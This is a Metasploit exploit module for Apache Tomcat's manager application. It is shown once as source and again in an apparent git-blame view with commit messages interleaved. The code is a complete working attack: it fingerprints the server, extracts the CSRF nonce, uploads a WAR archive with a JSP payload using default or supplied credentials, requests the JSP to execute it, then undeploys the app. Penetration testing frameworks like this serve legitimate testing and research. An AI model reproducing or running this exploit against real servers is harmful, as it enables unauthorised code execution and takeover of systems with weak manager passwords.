metasploit-framework/modules/exploits/multi/http/tomcat_mgr_upload.rb

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',
      'Description' => %q{
        This module can be used to execute a payload on Apache Tomcat servers that
        have an exposed "manager" application. The payload is uploaded as a WAR archive
        containing a jsp application using a POST request against the /manager/html/upload
        component.

        NOTE: The compatible payload sets vary based on the selected target. For
        example, you must select the Windows target to use native Windows payloads.
      },
      'Author'      => [ 'rangercha' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          # This is based on jduck's tomcat_mgr_deploy.
          # the tomcat_mgr_deploy o longer works for current versions of tomcat due to
          # CSRF protection tokens. Also PUT requests against the /manager/html/deploy
          # aren't allowed anymore.

          # There is no single vulnerability associated with deployment functionality.
          # Instead, the focus has been on insecure/blank/hardcoded default passwords.

          #  The following references refer to HP Operations Manager
          [ 'CVE', '2009-3843' ],
          [ 'OSVDB', '60317' ],
          [ 'CVE', '2009-4189' ],
          [ 'OSVDB', '60670' ],

          # HP Operations Dashboard
          [ 'CVE', '2009-4188' ],

          # IBM Cognos Express Default user/pass
          [ 'BID', '38084' ],
          [ 'CVE', '2010-0557' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179' ],

          # IBM Rational Quality Manager and Test Lab Manager
          [ 'CVE', '2010-4094' ],
          [ 'ZDI', '10-214' ],

          # 'admin' password is blank in default Windows installer
          [ 'CVE', '2009-3548' ],
          [ 'OSVDB', '60176' ],
          [ 'BID', '36954' ],

          # tomcat docs
          [ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
        ],
      'Platform'    => %w{ java linux win }, # others?
      'Targets'     =>
        [
          #
          # detect via /manager/serverinfo
          #
          # do target detection but java meter by default
          [ 'Automatic',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            }
          ],
          [ 'Java Universal',
            {
              'Arch'     => ARCH_JAVA,
              'Platform' => 'java'
            },
          ],
          #
          # Platform specific targets only
          #
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            },
          ],
          [ 'Linux x86',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'linux'
            },
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 09 2009'))

    register_options(
      [
        OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
        OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
        # /cognos_express/manager/ for Cognos Express (19300)
        OptString.new('TARGETURI', [ true,  "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])
      ], self.class)
  end

  def check
    res = query_manager
    disconnect
    return CheckCode::Unknown if res.nil?

    if res.code == 200
      report_auth_info(
          :host   => rhost,
          :port   => rport,
          :sname  => (ssl ? "https" : "http"),
          :user   => datastore['USERNAME'],
          :pass   => datastore['PASSWORD'],
          :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
          :active => true
      )
      return CheckCode::Appears
    end

    if res.code.between?(400, 499)
      vprint_error("Server rejected the credentials")
      return CheckCode::Unknown
    end

    return CheckCode::Safe
  end

  def auto_target
    print_status("Attempting to automatically select a target...")

    res = query_status()
    return nil if not res

    plat = detect_platform(res.body)
    arch = detect_arch(res.body)

    # No arch or platform found?
    if (not arch or not plat)
      return nil
    end

    # see if we have a match
    targets.each { |t|
      if (t['Platform'] == plat) and (t['Arch'] == arch)
        return t
      end
    }

    # no matching target found
    return nil
  end


  def exploit
    mytarget = target
    if (target.name =~ /Automatic/)
      mytarget = auto_target
      if (not mytarget)
        fail_with(Failure::NoTarget, "Unable to automatically select a target")
      end
      print_status("Automatically selected target \"#{mytarget.name}\"")
    else
      print_status("Using manually select target \"#{mytarget.name}\"")
    end

    # We must regenerate the payload in case our auto-magic changed something.
    p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)

    # Generate the WAR containing the EXE containing the payload
    jsp_name = rand_text_alphanumeric(4+rand(32-4))
    app_base = rand_text_alphanumeric(4+rand(32-4))

    # Generate the WAR containing the payload
    war = p.encoded_war({
        :app_name => app_base,
        :jsp_name => jsp_name,
        :arch => mytarget.arch,
        :platform => mytarget.platform
      }).to_s

    #find CSRF Token
    res = query_manager
    return nil unless res and res.code == 200

    session_id = res.get_cookies()
    csrf_token = find_csrf(res)

    if(csrf_token==nil)
      query_str = ""
    else
      query_str = "?path=/"
      query_str << app_base
      query_str << "&org.apache.catalina.filters.CSRF_NONCE=" + csrf_token
    end

    # UPLOAD
    #
    path_tmp = normalize_uri(target_uri.path.to_s, "html", "upload") + query_str
    print_status("Uploading #{war.length} bytes as #{app_base}.war ...")

    boundary_identifier=rand_text_numeric(28)

    warmultipart = "-----------------------------"
    warmultipart << boundary_identifier
    warmultipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""
    warmultipart << app_base
    warmultipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"
    warmultipart <<  war
    warmultipart << "\r\n-----------------------------"
    warmultipart << boundary_identifier
    warmultipart << "--\r\n"


    res = send_request_cgi({
      'uri'          => path_tmp,
      'method'       => 'POST',
      'ctype'        => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,
      'user'	     => datastore['USERNAME'],
      'password'     => datastore['PASSWORD'],
      'cookie'       => session_id,
      'data'         => warmultipart,
    }, 20)
    if (! res)
      fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [No Response]")
    end
    if (res.code < 200 or res.code >= 300)
      case res.code
      when 401
        print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
      end
      fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]")
    end

    report_auth_info(
      :host   => rhost,
      :port   => rport,
      :sname  => (ssl ? "https" : "http"),
      :user   => datastore['USERNAME'],
      :pass   => datastore['PASSWORD'],
      :proof  => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
      :active => true
    )

    #
    # EXECUTE
    #
    jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'
    print_status("Executing #{jsp_path}...")
    res = send_request_cgi({
      'uri'          => jsp_path,
      'method'       => 'GET'
    }, 20)

    if (! res)
      print_error("Execution failed on #{app_base} [No Response]")
    elsif (res.code < 200 or res.code >= 300)
      print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
      vprint_status(res.body)
    end

    #Get the new CSRF token & session id
    res = query_manager
    return nil unless res and res.code == 200

    session_id = res.get_cookies()
    csrf_token = find_csrf(res)

    if(csrf_token==nil)
      query_str = ""
    else
      query_str = "?path=/"
      query_str << app_base
      query_str << "&org.apache.catalina.filters.CSRF_NONCE=" + csrf_token
    end
    #
    # DELETE
    #
    path_tmp = normalize_uri(target_uri.path.to_s, "html", "undeploy") + query_str
    print_status("Undeploying #{app_base} ...")
    res = send_request_cgi({
      'uri'          => path_tmp,
      'method'       => 'POST',
      'user'	     => datastore['USERNAME'],
      'password'     => datastore['PASSWORD'],
      'cookie'       => session_id
    }, 20)
    if (! res)
      print_warning("WARNING: Undeployment failed on #{path_tmp} [No Response]")
    elsif (res.code < 200 or res.code >= 300)
      print_warning("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")
    end

    handler
  end

  def query_status()
    path = normalize_uri(target_uri.path.to_s, '/status')
    res = send_request_raw(
      {
        'uri'   => path
      }, 10)

    if (not res) or (res.code != 200)
      print_error("Failed: Error requesting #{path}")
      return nil
    end

    vprint_status(res.body)

    return res
  end

  def query_manager
    path = normalize_uri(target_uri.path.to_s, '/html')
    res = send_request_raw('uri' => path)

    return res
  end

  def detect_platform(body = nil)
    if not body
      res = query_status()
      return nil if not res
      body = res.body
    end

    i=0

    body.each_line { |ln|
      ln.chomp!

      case ln
      when /OS Name/
        i=1

      end

      if (i==9 or i==11)
        if ln.include? "Windows"
          return 'win'
        elsif ln.include? "Linux"
          return 'linux'
        elsif i==11
          return 'unknown'
        end
      end
      if i>0
         i=i+1
      end
    }
  end

  def detect_arch(body)
    if not body
      res = query_status()
      return nil if not res
      body = res.body
    end

    i=0
    body.each_line { |ln|
      ln.chomp!

      case ln
      when /OS Architecture/
       i=1
      end
      if (i==9 or i==11)
        if ln.include? 'x86'
          return ARCH_X86
        elsif ln.include? 'i386'
          return ARCH_X86
        elsif ln.include? 'i686'
          return ARCH_X86
        elsif ln.include? 'x86_64'
          return ARCH_X86
        elsif ln.include? 'amd64'
          return ARCH_X86
        elsif i==11
          return 'unknown'
        end

      end
      if i>0
        i=i+1
      end
    }
  end

  def find_csrf(res = nil)
    print_status("Finding CSRF")
    body=res.body
    body.each_line { |ln|
      ln.chomp!
      csrf_string = "CSRF_NONCE="
      csrf_nonce = ln.index(csrf_string)
      csrf_test=0
      if csrf_nonce == nil
        csrf_test = -1
      else
        csrf_test = csrf_nonce
      end
      if csrf_test>=0

        token = ln[csrf_nonce+csrf_string.length,32]
        return token

      end
    }

    return ""
  end

end
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`##`
			`# This module requires Metasploit: http//metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`HttpFingerprint = { :pattern => [ /Apache.*(Coyote\|Tomcat)/ ] }`

			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Exploit::EXE`

			`def initialize(info = {})`
			`super(update_info(info,`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`'Name' => 'Apache Tomcat Manager Application Upload Authenticated Code Execution',`
			`'Description' => %q{`
			`This module can be used to execute a payload on Apache Tomcat servers that`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`have an exposed "manager" application. The payload is uploaded as a WAR archive`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`containing a jsp application using a POST request against the /manager/html/upload`
			`component.`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00
			`NOTE: The compatible payload sets vary based on the selected target. For`
			`example, you must select the Windows target to use native Windows payloads.`
			`},`
			`'Author' => [ 'rangercha' ],`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`'License' => MSF_LICENSE,`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`'References' =>`
			`[`
			`# This is based on jduck's tomcat_mgr_deploy.`
			`# the tomcat_mgr_deploy o longer works for current versions of tomcat due to`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`# CSRF protection tokens. Also PUT requests against the /manager/html/deploy`
			`# aren't allowed anymore.`

Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`# There is no single vulnerability associated with deployment functionality.`
			`# Instead, the focus has been on insecure/blank/hardcoded default passwords.`

Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`# The following references refer to HP Operations Manager`
			`[ 'CVE', '2009-3843' ],`
			`[ 'OSVDB', '60317' ],`
			`[ 'CVE', '2009-4189' ],`
			`[ 'OSVDB', '60670' ],`

			`# HP Operations Dashboard`
			`[ 'CVE', '2009-4188' ],`

			`# IBM Cognos Express Default user/pass`
			`[ 'BID', '38084' ],`
			`[ 'CVE', '2010-0557' ],`
			`[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21419179' ],`

			`# IBM Rational Quality Manager and Test Lab Manager`
			`[ 'CVE', '2010-4094' ],`
			`[ 'ZDI', '10-214' ],`

			`# 'admin' password is blank in default Windows installer`
			`[ 'CVE', '2009-3548' ],`
			`[ 'OSVDB', '60176' ],`
			`[ 'BID', '36954' ],`

			`# tomcat docs`
			`[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`],`
			`'Platform' => %w{ java linux win }, # others?`
			`'Targets' =>`
			`[`
			`#`
			`# detect via /manager/serverinfo`
			`#`
			`# do target detection but java meter by default`
			`[ 'Automatic',`
			`{`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`'Arch' => ARCH_JAVA,`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`'Platform' => 'java'`
			`}`
			`],`
			`[ 'Java Universal',`
			`{`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`'Arch' => ARCH_JAVA,`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`'Platform' => 'java'`
			`},`
			`],`
			`#`
			`# Platform specific targets only`
			`#`
			`[ 'Windows Universal',`
			`{`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`'Arch' => ARCH_X86,`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`'Platform' => 'win'`
			`},`
			`],`
			`[ 'Linux x86',`
			`{`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`'Arch' => ARCH_X86,`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`'Platform' => 'linux'`
			`},`
			`],`
			`],`
			`'DefaultTarget' => 0,`
			`'DisclosureDate' => 'Nov 09 2009'))`

			`register_options(`
			`[`
			`OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),`
			`OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),`
			`# /cognos_express/manager/ for Cognos Express (19300)`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`OptString.new('TARGETURI', [ true, "The URI path of the manager app (/html/upload and /undeploy will be used)", '/manager'])`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`], self.class)`
			`end`

			`def check`
			`res = query_manager`
			`disconnect`
			`return CheckCode::Unknown if res.nil?`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00
Clean query_manager 2014-01-30 20:20:02 +00:00			`if res.code == 200`
			`report_auth_info(`
			`:host => rhost,`
			`:port => rport,`
			`:sname => (ssl ? "https" : "http"),`
			`:user => datastore['USERNAME'],`
			`:pass => datastore['PASSWORD'],`
			`:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",`
			`:active => true`
			`)`
			`return CheckCode::Appears`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`end`

Clean query_manager 2014-01-30 20:20:02 +00:00			`if res.code.between?(400, 499)`
			`vprint_error("Server rejected the credentials")`
			`return CheckCode::Unknown`
			`end`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00
Clean query_manager 2014-01-30 20:20:02 +00:00			`return CheckCode::Safe`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`end`

			`def auto_target`
			`print_status("Attempting to automatically select a target...")`

			`res = query_status()`
			`return nil if not res`

			`plat = detect_platform(res.body)`
			`arch = detect_arch(res.body)`

			`# No arch or platform found?`
			`if (not arch or not plat)`
			`return nil`
			`end`

			`# see if we have a match`
			`targets.each { \|t\|`
			`if (t['Platform'] == plat) and (t['Arch'] == arch)`
			`return t`
			`end`
			`}`

			`# no matching target found`
			`return nil`
			`end`



			`def exploit`
			`mytarget = target`
			`if (target.name =~ /Automatic/)`
			`mytarget = auto_target`
			`if (not mytarget)`
			`fail_with(Failure::NoTarget, "Unable to automatically select a target")`
			`end`
			`print_status("Automatically selected target \"#{mytarget.name}\"")`
			`else`
			`print_status("Using manually select target \"#{mytarget.name}\"")`
			`end`

			`# We must regenerate the payload in case our auto-magic changed something.`
			`p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)`

			`# Generate the WAR containing the EXE containing the payload`
			`jsp_name = rand_text_alphanumeric(4+rand(32-4))`
			`app_base = rand_text_alphanumeric(4+rand(32-4))`

			`# Generate the WAR containing the payload`
			`war = p.encoded_war({`
			`:app_name => app_base,`
			`:jsp_name => jsp_name,`
			`:arch => mytarget.arch,`
			`:platform => mytarget.platform`
			`}).to_s`

			`#find CSRF Token`
Clean query_manager 2014-01-30 20:20:02 +00:00			`res = query_manager`
			`return nil unless res and res.code == 200`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00
			`session_id = res.get_cookies()`
			`csrf_token = find_csrf(res)`

			`if(csrf_token==nil)`
			`query_str = ""`
			`else`
			`query_str = "?path=/"`
			`query_str << app_base`
			`query_str << "&org.apache.catalina.filters.CSRF_NONCE=" + csrf_token`
			`end`

			`# UPLOAD`
			`#`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`path_tmp = normalize_uri(target_uri.path.to_s, "html", "upload") + query_str`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`print_status("Uploading #{war.length} bytes as #{app_base}.war ...")`

			`boundary_identifier=rand_text_numeric(28)`

			`warmultipart = "-----------------------------"`
			`warmultipart << boundary_identifier`
			`warmultipart << "\r\nContent-Disposition: form-data; name=\"deployWar\"; filename=\""`
			`warmultipart << app_base`
			`warmultipart << ".war\"\r\nContent-Type: application/octet-stream\r\n\r\n"`
			`warmultipart << war`
			`warmultipart << "\r\n-----------------------------"`
			`warmultipart << boundary_identifier`
			`warmultipart << "--\r\n"`


			`res = send_request_cgi({`
			`'uri' => path_tmp,`
			`'method' => 'POST',`
			`'ctype' => 'multipart/form-data; boundary=---------------------------' + boundary_identifier,`
			`'user' => datastore['USERNAME'],`
			`'password' => datastore['PASSWORD'],`
			`'cookie' => session_id,`
			`'data' => warmultipart,`
			`}, 20)`
			`if (! res)`
			`fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [No Response]")`
			`end`
			`if (res.code < 200 or res.code >= 300)`
			`case res.code`
			`when 401`
			`print_warning("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] \|\| res.headers['Authentication']}")`
			`end`
			`fail_with(Failure::Unknown, "Upload failed on #{path_tmp} [#{res.code} #{res.message}]")`
			`end`

			`report_auth_info(`
			`:host => rhost,`
			`:port => rport,`
			`:sname => (ssl ? "https" : "http"),`
			`:user => datastore['USERNAME'],`
			`:pass => datastore['PASSWORD'],`
			`:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",`
			`:active => true`
			`)`

			`#`
			`# EXECUTE`
			`#`
			`jsp_path = '/' + app_base + '/' + jsp_name + '.jsp'`
			`print_status("Executing #{jsp_path}...")`
			`res = send_request_cgi({`
			`'uri' => jsp_path,`
			`'method' => 'GET'`
			`}, 20)`

			`if (! res)`
			`print_error("Execution failed on #{app_base} [No Response]")`
			`elsif (res.code < 200 or res.code >= 300)`
			`print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")`
			`vprint_status(res.body)`
			`end`

			`#Get the new CSRF token & session id`
Clean query_manager 2014-01-30 20:20:02 +00:00			`res = query_manager`
			`return nil unless res and res.code == 200`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00
			`session_id = res.get_cookies()`
			`csrf_token = find_csrf(res)`

			`if(csrf_token==nil)`
			`query_str = ""`
			`else`
			`query_str = "?path=/"`
			`query_str << app_base`
			`query_str << "&org.apache.catalina.filters.CSRF_NONCE=" + csrf_token`
			`end`
			`#`
			`# DELETE`
			`#`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`path_tmp = normalize_uri(target_uri.path.to_s, "html", "undeploy") + query_str`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`print_status("Undeploying #{app_base} ...")`
			`res = send_request_cgi({`
			`'uri' => path_tmp,`
			`'method' => 'POST',`
			`'user' => datastore['USERNAME'],`
			`'password' => datastore['PASSWORD'],`
			`'cookie' => session_id`
			`}, 20)`
			`if (! res)`
			`print_warning("WARNING: Undeployment failed on #{path_tmp} [No Response]")`
			`elsif (res.code < 200 or res.code >= 300)`
			`print_warning("Deletion failed on #{path_tmp} [#{res.code} #{res.message}]")`
			`end`

			`handler`
			`end`

			`def query_status()`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`path = normalize_uri(target_uri.path.to_s, '/status')`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00			`res = send_request_raw(`
			`{`
			`'uri' => path`
			`}, 10)`

			`if (not res) or (res.code != 200)`
			`print_error("Failed: Error requesting #{path}")`
			`return nil`
			`end`

			`vprint_status(res.body)`

			`return res`
			`end`

Clean query_manager 2014-01-30 20:20:02 +00:00			`def query_manager`
Clean metadata and use TARGETURI 2014-01-30 20:03:52 +00:00			`path = normalize_uri(target_uri.path.to_s, '/html')`
Clean query_manager 2014-01-30 20:20:02 +00:00			`res = send_request_raw('uri' => path)`
Added new module. Abuses tomcat manager upload page. Tested on tomcat 5.5.36, 6.0.37, 7.0.50, 8.0.0rc10 2014-01-27 14:04:59 +00:00
			`return res`
			`end`

			`def detect_platform(body = nil)`
			`if not body`
			`res = query_status()`
			`return nil if not res`
			`body = res.body`
			`end`

			`i=0`

			`body.each_line { \|ln\|`
			`ln.chomp!`

			`case ln`
			`when /OS Name/`
			`i=1`

			`end`

			`if (i==9 or i==11)`
			`if ln.include? "Windows"`
			`return 'win'`
			`elsif ln.include? "Linux"`
			`return 'linux'`
			`elsif i==11`
			`return 'unknown'`
			`end`
			`end`
			`if i>0`
			`i=i+1`
			`end`
			`}`
			`end`

			`def detect_arch(body)`
			`if not body`
			`res = query_status()`
			`return nil if not res`
			`body = res.body`
			`end`

			`i=0`
			`body.each_line { \|ln\|`
			`ln.chomp!`

			`case ln`
			`when /OS Architecture/`
			`i=1`
			`end`
			`if (i==9 or i==11)`
			`if ln.include? 'x86'`
			`return ARCH_X86`
			`elsif ln.include? 'i386'`
			`return ARCH_X86`
			`elsif ln.include? 'i686'`
			`return ARCH_X86`
			`elsif ln.include? 'x86_64'`
			`return ARCH_X86`
			`elsif ln.include? 'amd64'`
			`return ARCH_X86`
			`elsif i==11`
			`return 'unknown'`
			`end`

			`end`
			`if i>0`
			`i=i+1`
			`end`
			`}`
			`end`

			`def find_csrf(res = nil)`
			`print_status("Finding CSRF")`
			`body=res.body`
			`body.each_line { \|ln\|`
			`ln.chomp!`
			`csrf_string = "CSRF_NONCE="`
			`csrf_nonce = ln.index(csrf_string)`
			`csrf_test=0`
			`if csrf_nonce == nil`
			`csrf_test = -1`
			`else`
			`csrf_test = csrf_nonce`
			`end`
			`if csrf_test>=0`

			`token = ln[csrf_nonce+csrf_string.length,32]`
			`return token`

			`end`
			`}`

			`return ""`
			`end`

			`end`